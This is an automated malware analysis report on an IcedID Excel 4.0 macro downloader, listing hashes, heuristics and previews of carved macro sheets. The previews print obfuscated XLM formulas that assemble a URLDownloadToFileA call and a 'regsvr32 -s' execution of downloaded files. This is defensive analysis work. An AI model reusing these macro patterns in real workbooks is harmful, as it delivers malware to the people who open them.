IcedID — Office (OOXML) malware analysis

Static analysis result for SHA-256 73ddbee444fed270…

MALICIOUS

Office (OOXML)

338.6 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-06-17
MD5: a6a6089061b2b7ea05fa8dfbc44a8d39 SHA-1: ba200e019089ca38ac946a2b5f5edd19ff2c4094 SHA-256: 73ddbee444fed2709283f10ba9819bb28402c7f980c7b09ccd4a4d077bca8be7
250 Risk Score

Malware Insights

IcedID · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution T1105 Ingress Tool Transfer

The file contains multiple Excel 4.0 macro sheets utilizing dangerous functions like FORMULA, GOTO, and HALT, which are known primitives for downloading and executing payloads. Specifically, the macros construct commands to execute 'regsvr32 -s' with filenames like 'Post.storg', indicating a download and execution attempt. The embedded URLs point to IP addresses that are likely hosting the second-stage payload. ClamAV also identifies the file as Xls.Downloader.IcedID.

Heuristics 6

  • ClamAV: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0
  • Excel 4.0 macro sheet (12 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
  • Dangerous XLM formula APIs: FORMULA, GOTO, HALT critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 13 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 12

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet1.xml 1530 bytes
SHA-256: fc193fe050abacb880485b5f38bdab4ecaff147a3f3c5d98d30819adf85ad6bc
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{D8721A71-CD51-4A41-9113-7F1C72E4210E}"><dimension ref="G11:G18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="9.140625" style="2"/><col min="7" max="7" width="13.5703125" style="2" bestFit="1" customWidth="1"/><col min="8" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="11" spans="7:7" x14ac:dyDescent="0.25"><c r="G11" s="2" t="b"><f>FORMULA('1rtgvrt'!F14,H11)</f><v>0</v></c></row><row r="18" spans="7:7" x14ac:dyDescent="0.25"><c r="G18" s="2" t="e"><f>GOTO(nowik!E11)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_01.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet2.xml 1749 bytes
SHA-256: 87a6d8985da42cc676636380616a82a7140d5129d4edb0e256a775f3c0778fd8
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{1A122326-E9BA-4F4E-8218-736BBDAC7C9B}"><dimension ref="E9:H18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="9.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="9.28515625" style="2"/></cols><sheetData><row r="9" spans="5:8" x14ac:dyDescent="0.25"><c r="H9" s="2" t="b"><f>FORMULA(E14,I9)</f><v>0</v></c></row><row r="14" spans="5:8" x14ac:dyDescent="0.25"><c r="E14" s="2" t="str"><f>CONCATENATE(now!H11,'1rtgvrt'!F15,'1rtgvrt'!F16,'1rtgvrt'!F17,'1rtgvrt'!F18)</f><v>DownloadToFileA","JJCCBB","Kokiser",,1,9)</v></c><c r="H14" s="2" t="e"><f>GOTO('1rtgvrt'!J3)</f><v>#N/A</v></c></row><row r="18" spans="5:5" x14ac:dyDescent="0.25"><c r="E18" s="2" t="e"><f>GOTO(H6)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_02.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet3.xml 3667 bytes
SHA-256: 91b559e9a886c1182f31f272cc9b84a2781f1c4f15eaf9d6b041ed99cc7fe5fe
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{FFD5319C-BE4D-4645-9F69-A49923E2A0B7}"><dimension ref="F5:K21"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="9.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="9" width="9.28515625" style="2"/><col min="10" max="10" width="24.140625" style="2" bestFit="1" customWidth="1"/><col min="11" max="16384" width="9.28515625" style="2"/></cols><sheetData><row r="5" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="J5" s="2" t="str"><f>CONCATENATE(G12,nowik!I9)</f><v>=REGIS</v></c></row><row r="7" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="J7" s="2" t="b"><f>FORMULA(J5,J11)</f><v>0</v></c></row><row r="9" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="J9" s="2"><f>NOW()</f><v>44355.570300462961</v></c></row><row r="10" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="I10" s="2" t="s"><v>17</v></c></row><row r="11" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="I11" s="2" t="s"><v>18</v></c></row><row r="12" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="F12" s="2" t="s"><v>0</v></c><c r="G12" s="2" t="str"><f>F12&amp;F13</f><v>=REGIS</v></c></row><row r="13" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="F13" s="2" t="s"><v>1</v></c><c r="J13" s="2" t="e"><f>Kokiser(0,K13&amp;I14&amp;J9&amp;I10&amp;I11,'3fescvaer'!D19,0,0)</f><v>#NAME?</v></c><c r="K13" s="2" t="str"><f>K16&amp;K17&amp;K18</f><v>http://</v></c></row><row r="14" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="F14" s="2" t="s"><v>2</v></c><c r="I14" s="2" t="s"><v>19</v></c></row><row r="15" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="F15" s="2" t="s"><v>3</v></c><c r="I15" s="2" t="s"><v>20</v></c><c r="J15" s="2" t="e"><f>Kokiser(0,K13&amp;I15&amp;J9&amp;I10&amp;I11,'3fescvaer'!E19,0,0)</f><v>#NAME?</v></c></row><row r="16" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="F16" s="2" t="s"><v>4</v></c><c r="I16" s="2" t="s"><v>21</v></c><c r="K16" s="2" t="str"><f>"ht"</f><v>ht</v></c></row><row r="17" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="F17" s="2" t="s"><v>16</v></c><c r="J17" s="2" t="e"><f>Kokiser(0,K13&amp;I16&amp;J9&amp;I10&amp;I11,'3fescvaer'!F19,0,0)</f><v>#NAME?</v></c><c r="K17" s="2" t="s"><v>15</v></c></row><row r="18" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="F18" s="2" t="s"><v>5</v></c><c r="K18" s="2" t="str"><f>"://"</f><v>://</v></c></row><row r="21" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="J21" s="2" t="e"><f>GOTO('3fescvaer'!H4)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_03.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet4.xml 1467 bytes
SHA-256: e289be27df48583cb954f911940f6e3d7a5be456a4ad3df4bcb82338ae9ed155
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{08FF06FB-53F4-4C60-B529-3E06ECF04D2F}"><dimension ref="F13"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"><selection activeCell="B5" sqref="B5"/></sheetView></sheetViews><sheetFormatPr defaultColWidth="9.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="9.28515625" style="1"/></cols><sheetData><row r="13" spans="6:6" x14ac:dyDescent="0.25"><c r="F13" s="1" t="str"><f>'1rtgvrt'!F14</f><v>TER("u"&amp;"R"&amp;"l"&amp;"M"&amp;"o"&amp;"n","URL</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_04.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet5.xml 2410 bytes
SHA-256: 201fbba0db9ac4962b4c0b4ea8c26f6be8771118f4dac58acb9638dd80f6f7a1
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{CDFA6BE0-4EC6-4813-BBF5-B10594745E9F}"><dimension ref="D8:K19"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="9.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="9.28515625" style="2"/><col min="8" max="8" width="11.85546875" style="2" bestFit="1" customWidth="1"/><col min="9" max="16384" width="9.28515625" style="2"/></cols><sheetData><row r="8" spans="4:11" x14ac:dyDescent="0.25"><c r="D8" s="2" t="s"><v>0</v></c></row><row r="9" spans="4:11" x14ac:dyDescent="0.25"><c r="D9" s="2" t="s"><v>6</v></c></row><row r="10" spans="4:11" x14ac:dyDescent="0.25"><c r="D10" s="2" t="s"><v>7</v></c><c r="H10" s="2" t="b"><f>FORMULA(K10&amp;K11,I10)</f><v>0</v></c><c r="K10" s="2" t="str"><f>D9&amp;D10</f><v>EXE</v></c></row><row r="11" spans="4:11" x14ac:dyDescent="0.25"><c r="K11" s="2" t="str"><f>D12</f><v>C("regsvr</v></c></row><row r="12" spans="4:11" x14ac:dyDescent="0.25"><c r="D12" s="2" t="s"><v>8</v></c></row><row r="15" spans="4:11" x14ac:dyDescent="0.25"><c r="D15" s="2" t="s"><v>9</v></c><c r="E15" s="2" t="s"><v>10</v></c><c r="F15" s="2" t="s"><v>11</v></c></row><row r="17" spans="4:8" x14ac:dyDescent="0.25"><c r="H17" s="2" t="e"><f>GOTO('4scdac'!E7)</f><v>#N/A</v></c></row><row r="19" spans="4:8" x14ac:dyDescent="0.25"><c r="D19" s="2" t="s"><v>12</v></c><c r="E19" s="2" t="s"><v>13</v></c><c r="F19" s="2" t="s"><v>14</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_05.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet6.xml 1795 bytes
SHA-256: 96da058d75ae1cc6552b0708de01a38668efc28f8a6460e2c68e340c09907487
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{6935296E-C8D1-4321-B95E-CB5004965B95}"><dimension ref="E8:G17"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="9.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="9.28515625" style="2"/><col min="7" max="7" width="9.85546875" style="2" bestFit="1" customWidth="1"/><col min="8" max="16384" width="9.28515625" style="2"/></cols><sheetData><row r="8" spans="5:7" x14ac:dyDescent="0.25"><c r="G8" s="2" t="b"><f>FORMULA(E11,H8)</f><v>0</v></c></row><row r="11" spans="5:7" x14ac:dyDescent="0.25"><c r="E11" s="2" t="str"><f>CONCATENATE('3fescvaer'!I10,'3fescvaer'!D15)</f><v>32 -s "&amp;"."&amp;"."&amp;"\"&amp;"Post.storg")</v></c></row><row r="17" spans="5:7" x14ac:dyDescent="0.25"><c r="E17" s="2" t="e"><f>GOTO(G5)</f><v>#N/A</v></c><c r="G17" s="2" t="e"><f>GOTO('5fetaert'!F8)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_06.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet7.xml 1864 bytes
SHA-256: 917da5acb1bfc35854f30827ffa35a83b6c26c2227c0890b933169a86e93394b
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{078DCCE8-688A-4A64-BAF3-B17F03BE9DA7}"><dimension ref="F12:H19"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="9.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="9.28515625" style="2"/><col min="8" max="8" width="10.42578125" style="2" bestFit="1" customWidth="1"/><col min="9" max="16384" width="9.28515625" style="2"/></cols><sheetData><row r="12" spans="6:8" x14ac:dyDescent="0.25"><c r="H12" s="2" t="b"><f>FORMULA(F14,I12)</f><v>0</v></c></row><row r="14" spans="6:8" x14ac:dyDescent="0.25"><c r="F14" s="2" t="str"><f>CONCATENATE('3fescvaer'!I10,'3fescvaer'!E15)</f><v>32 -s "&amp;"."&amp;"."&amp;"\"&amp;"Post.storg1")</v></c></row><row r="19" spans="6:8" x14ac:dyDescent="0.25"><c r="F19" s="2" t="e"><f>GOTO(H10)</f><v>#N/A</v></c><c r="H19" s="2" t="e"><f>GOTO('6vrtgarga'!F8)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_07.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet8.xml 1853 bytes
SHA-256: a245b6e3786685cfced608c3e674730ff0d2cebee20970e6244967e1b369bc9d
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{8BFD2F9D-2703-4B11-B294-3AA1C241D46A}"><dimension ref="F14:H21"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="9.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="9.28515625" style="2"/><col min="8" max="8" width="10.140625" style="2" bestFit="1" customWidth="1"/><col min="9" max="16384" width="9.28515625" style="2"/></cols><sheetData><row r="14" spans="6:8" x14ac:dyDescent="0.25"><c r="H14" s="2" t="b"><f>FORMULA(F16,I14)</f><v>0</v></c></row><row r="16" spans="6:8" x14ac:dyDescent="0.25"><c r="F16" s="2" t="str"><f>CONCATENATE('3fescvaer'!I10,'3fescvaer'!F15)</f><v>32 -s "&amp;"."&amp;"."&amp;"\"&amp;"Post.storg2")</v></c></row><row r="20" spans="6:8" x14ac:dyDescent="0.25"><c r="F20" s="2" t="e"><f>GOTO(H10)</f><v>#N/A</v></c></row><row r="21" spans="6:8" x14ac:dyDescent="0.25"><c r="H21" s="2" t="e"><f>GOTO('7rvgasdg'!F7)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_08.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet9.xml 1801 bytes
SHA-256: 642b7689928f041978c812f5bb3cc9224bf9f61c5f6030a314ece1f910c899f4
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{A0188A28-7838-4B0D-9254-F48650F43D63}"><dimension ref="F10:H18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="9.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="9.28515625" style="2"/><col min="8" max="8" width="11.5703125" style="2" bestFit="1" customWidth="1"/><col min="9" max="16384" width="9.28515625" style="2"/></cols><sheetData><row r="10" spans="6:8" x14ac:dyDescent="0.25"><c r="H10" s="2" t="b"><f>FORMULA(F12,H13)</f><v>0</v></c></row><row r="12" spans="6:8" x14ac:dyDescent="0.25"><c r="F12" s="2" t="str"><f>CONCATENATE('3fescvaer'!D8,'4scdac'!H8)</f><v>=</v></c></row><row r="16" spans="6:8" x14ac:dyDescent="0.25"><c r="F16" s="2" t="e"><f>GOTO(H7)</f><v>#N/A</v></c></row><row r="18" spans="8:8" x14ac:dyDescent="0.25"><c r="H18" s="2" t="e"><f>GOTO('8aevgadrg'!G13)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_09.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet10.xml 1749 bytes
SHA-256: 244e5408a6c1492e9555dedab50bed6666518db12352d3523be0e820e009390a
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{3109CC0F-EF1F-4DD9-B997-DEE69BAC76DD}"><dimension ref="G15:I22"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="9.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="8" width="9.28515625" style="2"/><col min="9" max="9" width="9.5703125" style="2" bestFit="1" customWidth="1"/><col min="10" max="16384" width="9.28515625" style="2"/></cols><sheetData><row r="15" spans="9:9" x14ac:dyDescent="0.25"><c r="I15" s="2" t="b"><f>FORMULA(G18,I18)</f><v>0</v></c></row><row r="18" spans="7:9" x14ac:dyDescent="0.25"><c r="G18" s="2" t="str"><f>CONCATENATE('3fescvaer'!D8,'5fetaert'!I12)</f><v>=</v></c></row><row r="22" spans="7:9" x14ac:dyDescent="0.25"><c r="G22" s="2" t="e"><f>GOTO(I11)</f><v>#N/A</v></c><c r="I22" s="2" t="e"><f>GOTO('9rrvrv'!H11)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_10.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet11.xml 1856 bytes
SHA-256: e3af7de1bd35fb0d348f26f5d3069265aaeb3371cb20cc5cc65adcea3f3da515
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{21B3E0E8-D60B-4390-95D0-BA0828E3F0C6}"><dimension ref="H15:J21"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="9.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="9" width="9.28515625" style="2"/><col min="10" max="10" width="9.5703125" style="2" bestFit="1" customWidth="1"/><col min="11" max="16384" width="9.28515625" style="2"/></cols><sheetData><row r="15" spans="10:10" x14ac:dyDescent="0.25"><c r="J15" s="2" t="b"><f>FORMULA(H17,J18)</f><v>0</v></c></row><row r="17" spans="8:10" x14ac:dyDescent="0.25"><c r="H17" s="2" t="str"><f>CONCATENATE('3fescvaer'!D8,'6vrtgarga'!I14)</f><v>=</v></c></row><row r="20" spans="8:10" x14ac:dyDescent="0.25"><c r="J20" s="2" t="b"><f>HALT()</f><v>0</v></c></row><row r="21" 